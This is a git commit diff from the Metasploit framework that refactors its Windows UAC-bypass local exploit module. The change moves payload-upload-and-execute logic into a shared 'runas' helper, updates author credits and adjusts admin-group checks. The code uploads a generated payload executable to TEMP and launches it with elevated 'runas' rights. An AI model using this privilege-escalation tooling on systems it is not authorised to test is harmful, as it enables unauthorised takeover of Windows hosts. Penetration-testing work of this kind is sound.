Merge runas updates from Meatballs1/update_bypass_uac

OJ · OJ · commit 8be813e51d34 · 2015-01-08T21:21:19.000+10:00
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
@@ -12,7 +12,7 @@ module Msf::Post::Windows::Runas
   def shell_execute_exe(filename = nil, path = nil)
     exe_payload = generate_payload_exe
     payload_filename = filename || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
-    payload_path = path || expand_path('%TEMP%')
+    payload_path = path || get_env('TEMP')
     cmd_location = "#{payload_path}\\#{payload_filename}"
     print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
     write_file(cmd_location, exe_payload)
diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Local
   include Post::File
   include Post::Windows::Priv
   include Post::Windows::ReflectiveDLLInjection
+  include Post::Windows::Runas
 
   def initialize(info={})
     super( update_info( info,
@@ -33,7 +34,9 @@ def initialize(info={})
           'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
           'mitnick',
           'mubix', # Port to local exploit
-          'Ben Campbell' # In memory technique
+          'Ben Campbell', # In memory technique
+          'Lesage', # Win8+ updates
+          'OJ Reeves' # Win 8+ updates
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
@@ -76,7 +79,7 @@ def exploit
         print_good('BypassUAC can bypass this setting, continuing...')
       when UAC_NO_PROMPT
         print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
-        runas_method(env_vars['TEMP'])
+        shell_execute_exe
         return
     end
 
@@ -142,20 +145,6 @@ def check_permissions!
     end
   end
 
-  def runas_method(temp_dir)
-    payload = generate_payload_exe
-    payload_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
-    temp_exe = "#{temp_dir}\\#{payload_filename}"
-
-    print_status("Uploading payload: #{temp_exe}")
-    write_file(temp_exe, payload)
-    register_file_for_cleanup(temp_exe)
-
-    print_status("Executing payload: #{temp_exe}")
-    session.railgun.shell32.ShellExecuteA(nil, 'runas', temp_exe, nil, nil, 5)
-    print_status('Payload executed.')
-  end
-
   def run_injection(pid, dll_path, file_paths)
     vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
     begin
@@ -226,9 +215,7 @@ def validate_environment!
     if is_uac_enabled?
       print_status('UAC is Enabled, checking level...')
     else
-      if is_in_admin_group?
-        fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
-      else
+      unless is_in_admin_group?
         fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
       end
     end
